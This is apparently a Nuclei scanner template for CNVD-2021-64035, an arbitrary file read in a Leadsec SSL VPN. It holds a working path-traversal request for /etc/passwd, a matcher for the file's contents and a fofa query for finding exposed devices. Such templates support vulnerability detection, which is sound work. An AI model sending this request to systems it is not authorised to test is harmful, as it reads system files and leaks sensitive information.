id: CNVD-2021-64035

info:
  name: Leadsec VPN - Arbitrary File Read
  author: xiaoWangSec
  severity: high
  description: |
    There is an information leakage vulnerability in the SSL VPN of Beijing Wangyuxingyun Information Technology Co., Ltd., and attackers can use the vulnerability to obtain sensitive information.
  reference:
    - https://avd.aliyun.com/detail?id=AVD-2021-888761
    - https://www.cnvd.org.cn/flaw/show/CNVD-2021-64035
  metadata:
    verified: true
    max-request: 1
    fofa-query: icon_hash="-15980305"
  tags: 网御星云-VPN

http:
  - raw:
      - |
        GET /vpn/user/download/client?ostype=../../../../../../../../../etc/passwd HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: word
        part: header
        words:
          - "appframe"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100a116aefbd81adb68a0b53bf166cbe04f64b398ec87ac359d0dad01ad68beccc3022100b0564611ca028726a04d132f781f9347cdede59a636b07f5e8e9d13aae1c2d55:922c64590222798bb761d5b6d8e72950